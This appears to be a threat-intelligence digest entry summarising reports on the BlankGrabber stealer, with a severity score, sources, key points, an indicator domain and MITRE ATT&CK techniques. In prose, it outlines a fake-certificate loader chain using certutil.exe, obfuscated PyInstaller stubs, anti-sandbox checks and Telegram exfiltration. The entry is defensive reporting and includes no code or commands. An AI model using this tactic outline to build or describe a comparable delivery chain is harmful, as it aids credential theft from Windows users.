BlankGrabber Malware Exploits Fake Certificate Loader for Stealthy Attacks

Severity: High (Score: 67.5)

Sources: Cybersecuritynews, Gbhackers

Summary

BlankGrabber's operators are utilizing a fake certificate loader to conceal a sophisticated multi-stage infection chain involving Rust and Python. This method leverages built-in Windows tools like certutil.exe and heavily obfuscated PyInstaller stubs to evade detection. The malware begins with a batch script hosted on Gofile.io, which downloads a Rust executable masquerading as a certificate. Once executed, it performs anti-sandbox checks and drops a self-extracting RAR archive containing a remote-access client and the BlankGrabber stealer. This enables attackers to conduct remote control and data theft simultaneously. The malware targets Windows endpoints and employs various evasion techniques to avoid detection by security tools. The operators use Telegram and public web services for stealthy exfiltration of stolen data. The threat is significant due to the malware's ability to extract sensitive information from browsers and system profiles. Key Points: • BlankGrabber uses a fake certificate loader to hide its infection chain. • The malware employs sophisticated evasion techniques to avoid detection. • It targets Windows systems and can steal sensitive data from browsers.

Key Entities

• Malware (attack_type)
• cdn.discordapp.com (domain)
• BlankGrabber (malware)
• T1059 - Command and Scripting Interpreter (mitre_attack)
• T1105 - Ingress Tool Transfer (mitre_attack)
• T1567 - Exfiltration Over Web Service (mitre_attack)
• Windows (platform)
• Certutil.exe (tool)
• PyInstaller (tool)